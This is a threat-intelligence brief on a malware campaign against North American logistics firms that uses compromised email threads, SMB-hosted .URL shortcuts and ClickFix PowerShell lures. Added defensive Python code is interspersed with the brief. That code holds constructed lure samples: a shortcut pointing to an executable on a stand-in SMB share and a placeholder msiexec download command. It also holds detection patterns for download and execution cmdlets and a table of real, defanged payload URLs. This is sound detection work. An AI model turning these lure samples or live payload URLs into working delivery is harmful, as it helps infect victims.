Effective URL: https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering
Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering
to Target Transport and Logistics Firms with Malware


September 24, 2024 The Proofpoint Threat Research Team


WHAT HAPPENED

Proofpoint researchers are tracking a cluster of activity targeting
transportation and logistics companies in North America to deliver a variety of
malware payloads.

Notably, this activity leverages compromised legitimate email accounts that
belong to transportation and shipping companies. At this time, it is unclear how
the actor obtains access to these accounts. The actor injects malicious content
into existing conversations in the compromised account's inbox, which makes the
messages look legitimate. Proofpoint has identified at least 15 compromised
email accounts used in these campaigns.

Researchers have been tracking this activity cluster since late May 2024.
Activity from May to July 2024 predominantly delivered Lumma Stealer, StealC,
or NetSupport. In August 2024, the threat actor changed tactics, adopting new
infrastructure and a new delivery technique and adding DanaBot and Arechclient2
as payloads.

Most campaigns use messages with Google Drive URLs leading to an internet
shortcut (.URL) file, or a .URL file attached directly to the message. If the
shortcut is opened, Windows retrieves an executable over SMB from the remote
share it points to, and that executable installs the malware.
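The .URL-to-SMB step above is easy to triage mechanically, because an Internet Shortcut is just an INI-style text file whose [InternetShortcut] section holds the target in URL=. The following is an added example (not Proofpoint's code or tooling) that parses a .URL file and flags any target resolved from a remote share: a file:// URL with a host component, or a UNC path, in the URL, IconFile or WorkingDirectory keys. The two sample shortcuts are constructed for this example using a TEST-NET address and placeholder file names; they are not the indicators listed in this brief.

```python
"""Triage a Windows Internet Shortcut (.URL) for remote-share delivery.

Added example, not Proofpoint tooling. Windows resolves the URL= target when
the shortcut is opened and the IconFile= target when Explorer renders it, so a
file:// URL with a host part or a UNC path causes an outbound SMB (or WebDAV)
fetch. Sample shortcuts below are constructed (TEST-NET address).
"""
import configparser
import re
from urllib.parse import urlparse

# Keys whose value Windows resolves as a path or URL.
TARGET_KEYS = {"url", "iconfile", "workingdirectory"}
EXEC_EXT = re.compile(r"\.(exe|scr|vbs|js|jse|bat|cmd|msi|hta|dll|lnk)\s*$", re.I)
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")  # \\host\share\...


def parse_url_file(text):
    """Return the [InternetShortcut] key/value pairs (keys lower-cased)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def remote_host(value):
    """Return ("unc" | "file", host) if value is fetched from a remote share, else None."""
    v = value.strip().strip('"')
    m = UNC_RE.match(v)
    if m:
        return ("unc", m.group(1))
    p = urlparse(v)
    if p.scheme.lower() == "file":
        host = p.netloc
        if not host:  # file:////host/share/x and file://///host/share/x forms
            m = re.match(r"^[\\/]{2,}([^\\/]+)[\\/]", p.path)
            host = m.group(1) if m else ""
        if host:
            return ("file", host)
    return None


def triage(text):
    """List every key pointing at a remote share, with the host and whether the
    target name looks executable."""
    findings = []
    for key, value in parse_url_file(text).items():
        if key not in TARGET_KEYS:
            continue
        hit = remote_host(value)
        if hit:
            kind, host = hit
            findings.append({
                "key": key,
                "kind": kind,
                "host": host,
                "target": value.strip(),
                "executable": bool(EXEC_EXT.search(value.strip())),
            })
    return findings


def is_suspicious(text):
    return bool(triage(text))


# Constructed samples (TEST-NET address, placeholder names; not real indicators).
BENIGN = "[InternetShortcut]\r\nURL=https://www.example.com/\r\n"
LURE = (
    "[InternetShortcut]\r\n"
    "URL=file://192.0.2.10/share/rate_confirmation.exe\r\n"
    "IconIndex=0\r\n"
    "IconFile=\\\\192.0.2.10\\share\\icon.ico\r\n"
)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("lure", LURE)):
        print(name, is_suspicious(sample), triage(sample))
```

IconFile is worth checking even when URL= looks harmless: Explorer resolves it to draw the icon, so a UNC IconFile alone is enough to produce an outbound SMB connection from a file that was only previewed, not opened.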



Actor responds from a compromised account to a request within an ongoing
thread.

Actor uses a compromised account to post a malicious link to an ongoing
thread.

Campaigns typically include fewer than 20 messages and affect a small number of
customers, all in the transport and logistics industries in North America.

In August 2024, the actor also began using the "ClickFix" technique to deliver
malware. The messages contained URLs that led users through a series of dialog
boxes instructing them to copy, paste, and run a Base64-encoded PowerShell
script embedded in the page's HTML. The scripts led to an MSI file used to load
DanaBot.



Initial "ClickFix" dialog box, in which clicking the "Fix it" button copies a
Base64-encoded PowerShell script.

Final "ClickFix" dialog box, with instructions to open Windows PowerShell and
paste and run the script.

While Proofpoint has observed this technique leveraged by other threat actors
impersonating Word or Chrome updates, these campaigns have impersonated Samsara,
AMB Logistic, and Astra TMS – software that would only be used in transport and
fleet operations management.   
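ClickFix turns the user into the delivery mechanism, so the artifact a defender sees is not an attachment but a powershell.exe process whose command line carries the Base64 script the user pasted. As an added example (not Proofpoint tooling), the Python below decodes the two usual encodings, the -EncodedCommand flag (always UTF-16LE) and an inline [Convert]::FromBase64String literal (encoding sniffed), and scores the decoded text for MSI staging of the kind described above. The log lines are constructed: the encoded payload is generated in the block from a harmless placeholder command that points at a TEST-NET address, and that URL and path are not indicators from this brief.

```python
"""Decode Base64 PowerShell from process command lines and score ClickFix-style
MSI staging. Added example, not Proofpoint tooling. Sample command lines are
constructed; the encoded payload is generated here from a harmless placeholder
command pointing at a TEST-NET address (not an indicator from the brief)."""
import base64
import re

# -e / -ec / -enc / -EncodedCommand <b64>: PowerShell accepts these prefixes and
# the payload is always UTF-16LE.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Inline literal a ClickFix page may have the user paste: FromBase64String('...').
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.I)

INDICATORS = {
    "msi": re.compile(r"msiexec|\.msi\b", re.I),
    "download": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|WebClient|Start-BitsTransfer|\bcurl\b", re.I),
    "exec": re.compile(r"\biex\b|Invoke-Expression|Start-Process", re.I),
    "url": re.compile(r"https?://[^\s'\"]+", re.I),
    "stealth": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b|-nop\b|-ep\s+bypass|-ExecutionPolicy\s+Bypass", re.I),
}


def decode_b64(b64, utf16=None):
    """Decode Base64 text; UTF-16LE when forced, or when sniffed (NUL in odd bytes)."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    if utf16 is None:
        utf16 = len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4
    return raw.decode("utf-16-le" if utf16 else "utf-8", errors="replace")


def analyze(cmdline):
    """Decode embedded Base64 and score command line plus decoded text."""
    decoded = [decode_b64(m.group(1), utf16=True) for m in ENC_FLAG.finditer(cmdline)]
    decoded += [decode_b64(m.group(1)) for m in B64_LITERAL.finditer(cmdline)]
    text = cmdline + "\n" + "\n".join(decoded)
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    return {
        "decoded": decoded,
        "hits": hits,
        "urls": sorted(set(INDICATORS["url"].findall(text))),
        "score": sum(hits.values()),
    }


def triage_log(lines, threshold=3):
    """Return (line, analysis) for command lines scoring at or above threshold."""
    flagged = []
    for line in lines:
        a = analyze(line)
        if a["score"] >= threshold:
            flagged.append((line, a))
    return flagged


# Constructed placeholder for what a lure would have the user run (TEST-NET address).
PLACEHOLDER = "Start-Process msiexec.exe -ArgumentList '/i http://203.0.113.5/update.msi /qn'"


def _b64(s, encoding):
    return base64.b64encode(s.encode(encoding)).decode()


# Constructed Sysmon-style CommandLine values: flag form, literal form, benign.
SAMPLE_LOG = [
    "powershell.exe -w hidden -ep bypass -enc " + _b64(PLACEHOLDER, "utf-16-le"),
    "powershell -c \"iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + _b64(PLACEHOLDER, "utf-8") + "')))\"",
    "powershell.exe -NoProfile -Command Get-Service",
]

if __name__ == "__main__":
    for line, a in triage_log(SAMPLE_LOG):
        print(a["score"], a["urls"], line[:60])
```

The score is deliberately additive rather than a single signature: the ClickFix page controls the exact script, so matching on any one string is brittle, whereas "decoded Base64 that references an MSI, a URL and a process launch" survives rewording. Feed it the CommandLine field of your process-creation telemetry and treat the parent process (a browser or explorer.exe spawning powershell.exe with user-typed input) as a second signal.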


ATTRIBUTION

Proofpoint does not currently attribute this activity cluster to an identified
threat actor (TA). Similar techniques and infrastructure associated with
ClickFix, and the combination of Google Drive URLs, .URL files, and SMB, have
been observed in use by other threat actors and campaigns. Proofpoint
researchers assess that the threat actor discussed in this Security Brief is
purchasing this infrastructure from third-party providers.

Based on the observed initial access activity, malware delivery, and
infrastructure, Proofpoint assesses with moderate confidence the activity aligns
with financially motivated, cybercriminal objectives. 


WHY IT MATTERS

Threat actors are increasingly tailoring lures to be more realistic, to entice
recipients to click a link or download an attachment. Compromising legitimate
email accounts and injecting malicious links and attachments into an existing
email conversation achieves this goal and raises the likelihood that recipients
will install malware.

The specific targeting and compromise of organizations within transportation
and logistics, as well as the use of lures that impersonate software designed
specifically for freight operations and fleet management, indicate that the
actor likely researches the targeted company's operations before sending
campaigns. The language used in the lures and content also indicates
familiarity with typical business workflows.

This activity aligns with a trend Proofpoint researchers have observed across
the cybercriminal threat landscape. Threat actors are developing more
sophisticated social engineering and initial access techniques across the
delivery attack chain while relying more on commodity malware rather than
complex and unique malware payloads.  

Members of the transportation and logistics industry, and users in general,
should exercise caution with emails from known senders that deviate from normal
activity or content, particularly when combined with unusual-looking links and
file types such as those described in this Security Brief; in other words,
emails that do not look or feel right and trigger a sense that something is
off.

When encountering such activity, users should contact the sender through a
channel other than the email thread itself to confirm that the message is
genuine.


INDICATORS OF COMPROMISE

Indicator | Description | First Observed
199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431 | SHA256, .URL file | 2024-05-22
ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e | SHA256, .URL file | 2024-07-01
e7526dadae6b589b6a31f1f7e2e528ed1c9edd9f3d1ca88f0ece0dee349d3842 | SHA256, .URL file | 2024-07-12
e5ed1a273faf5174dbd8db9d6d3657b81dc2cbc2e0af28cfe76f41c3d2f2fc37 | SHA256, .URL file | 2024-07-24
f8b12e6d02ea5914e01f95b5665b3a735acfbb9ee6ae27b004af37547bc11e7f | SHA256, .URL file | 2024-08-05
0931217eb498b677e2558fd30d92169cc824914c2df68cfbcff4f642600e2cc2 | SHA256, .URL file | 2024-08-24
582c69b52d68b513f2a137bbf14704df7d787b06752333fc31066669cd663d04 | SHA256, .URL file | 2024-09-06
hxxp://89[.]23[.]98[.]98/file/14242.exe | URL, payload | 2024-05-22
hxxp://89[.]23[.]98[.]98/file/ratecon.exe | URL, payload | 2024-07-01
hxxp://89[.]23[.]98[.]98/file/rate_confirmation.vbs | URL, payload | 2024-07-12
hxxp://89[.]23[.]98[.]98/file/Rateconfirm.exe | URL, payload | 2024-07-24
hxxp://89[.]23[.]98[.]98/file/carrier.exe | URL, payload | 2024-08-05
hxxp://185[.]217[.]197[.]84/file/remittance.exe | URL, payload | 2024-08-24
hxxp://185[.]217[.]197[.]84/file/information_package.exe | URL, payload | 2024-09-06
hxxps://live-samsaratrucking[.]com/true-tracking-32934.html | URL, ClickFix | 2024-08-19
hxxp://ambcrrm[.]com/ | URL, ClickFix | 2024-09-03
hxxps://ambccm[.]com/Astra/index.html | URL, ClickFix | 2024-09-10
hxxps://idessit[.]com/fn.msi | URL, DanaBot payload | 2024-08-19
hxxps://ambccm[.]com/3.msi | URL, DanaBot payload | 2024-09-05
hxxps://ambcrrm[.]com/3.msi | URL, DanaBot payload | 2024-09-03
957fe77d04e04ff69fdaff8ef60ac0de24c9eb5e6186b3187460eac6be561f5d | SHA256, 14242.exe, suspected Lumma | 2024-06-14
2436fe37d25712b68b2e1a9805825bcf5073efb91588c1b5193ba446d1edd319 | SHA256, rate_confirmation.vbs, Lumma | 2024-07-12
8fe96fb9d820db0072fe0423c13d2d05f81a9cf0fdd6f4e2ee78dc4ca1d37618 | SHA256, ratecon.exe, StealC/NetSupport | 2024-07-24
cdf160c63f61ae834670fdaf040411511dc2fc0246292603e7aa8cd742d78013 | SHA256, Rateconfirm.exe, StealC | 2024-07-25
d45b6b04ac18ef566ac0ecdaf6a1f73d1c3164a845b83e0899c66c608154b93d | SHA256, carrier.exe, Arechclient2 | 2024-08-05
fddacfe9e490250e62f7f30b944fcbe122e87547d01c4a906401049304c395f7 | SHA256, fn.msi, DanaBot | 2024-08-19
163dccdcaa7fdde864573f2aabe0b9cb3fdcdc6785f422f5c2ee71ae6c0e413a | SHA256, remittance.exe | 2024-08-24
37f328fc723b2ddf0e7a20b57257cdb29fe9286cb4ffeaac9253cb3b86520235 | SHA256, 3.msi, DanaBot | 2024-09-03
1a002631b9b2e685aeb51e8b6f4409daf9bc0159cfd54ef9ad3ba69d651ac2a3 | SHA256, information_package.exe, Lumma Stealer | 2024-09-06
b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86 | SHA256, information_package.exe, StealC/NetSupport | 2024-09-10

Analyst note: Proofpoint researchers identified overlap in infrastructure between
this threat cluster and suspected UAC-0050 activity, but do not assess that the
activity sets are related at this time.
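The indicators above are published defanged (hxxp, [.]), so they must be normalized before they can be matched against logs, and a URL-level match alone misses the same host serving a renamed payload, which this actor did repeatedly on 89.23.98.98. As an added example (not Proofpoint's code), the block below refangs three of the URLs from the table, builds both a host set and an exact-URL set from them, and checks proxy log lines against both levels. The log lines are constructed and are written defanged here as well, so the same refang step is applied to them on load; the client addresses and timestamps are placeholders.

```python
"""Refang published indicators and match them against proxy log URLs.
Added example, not Proofpoint's code. The three indicators come from the table
above and are kept defanged in source; the log lines are constructed and are
also written defanged, so refang() is applied to them on load."""
import re
from urllib.parse import urlparse

DEFANG_SUBS = [
    (re.compile(r"\bhxxp(s?)://", re.I), r"http\1://"),
    (re.compile(r"\[\.\]|\(\.\)|\{\.\}|\s+dot\s+", re.I), "."),
    (re.compile(r"\[:\]"), ":"),
]


def refang(s):
    """Undo the usual defanging conventions so a string parses as a real URL."""
    for rx, repl in DEFANG_SUBS:
        s = rx.sub(repl, s)
    return s


def build_blocklist(iocs):
    """Return (hosts, urls): host set for coarse matching, exact URL set for precise."""
    hosts, urls = set(), set()
    for ioc in iocs:
        u = refang(ioc.strip())
        p = urlparse(u)
        if p.scheme in ("http", "https") and p.netloc:
            hosts.add(p.netloc.lower())
            urls.add(u.rstrip("/").lower())
    return hosts, urls


def match(url, hosts, urls):
    """'url' for an exact indicator hit, 'host' for same host but another path, else None."""
    u = url.strip().rstrip("/").lower()
    if u in urls:
        return "url"
    if urlparse(u).netloc in hosts:
        return "host"
    return None


def scan(log_lines, hosts, urls):
    """Constructed log format: '<ts> <client> <method> <url> <status>'."""
    results = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        kind = match(parts[3], hosts, urls)
        if kind:
            results.append((parts[0], parts[1], parts[3], kind))
    return results


# From the indicator table above, kept defanged in source.
IOCS = [
    "hxxp://89[.]23[.]98[.]98/file/carrier.exe",
    "hxxps://ambcrrm[.]com/3.msi",
    "hxxp://ambcrrm[.]com/",
]

# Constructed proxy log lines (defanged here too; refanged on load).
LOG = [refang(l) for l in [
    "2024-08-05T14:02:11Z 10.1.2.3 GET hxxp://89[.]23[.]98[.]98/file/carrier.exe 200",
    "2024-08-06T09:15:40Z 10.1.2.7 GET hxxp://89[.]23[.]98[.]98/file/other.exe 404",
    "2024-08-06T09:16:02Z 10.1.2.7 GET https://www.example.com/ 200",
    "2024-09-03T11:41:09Z 10.1.2.9 GET hxxps://ambcrrm[.]com/3.msi 200",
]]

HOSTS, URLS = build_blocklist(IOCS)

if __name__ == "__main__":
    for hit in scan(LOG, HOSTS, URLS):
        print(hit)
```

A "host" hit is lower confidence than a "url" hit and should be triaged rather than auto-blocked when the host is shared hosting or a CDN; for bare IP addresses like the two payload servers in this brief, blocking at the host level is the safer default.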
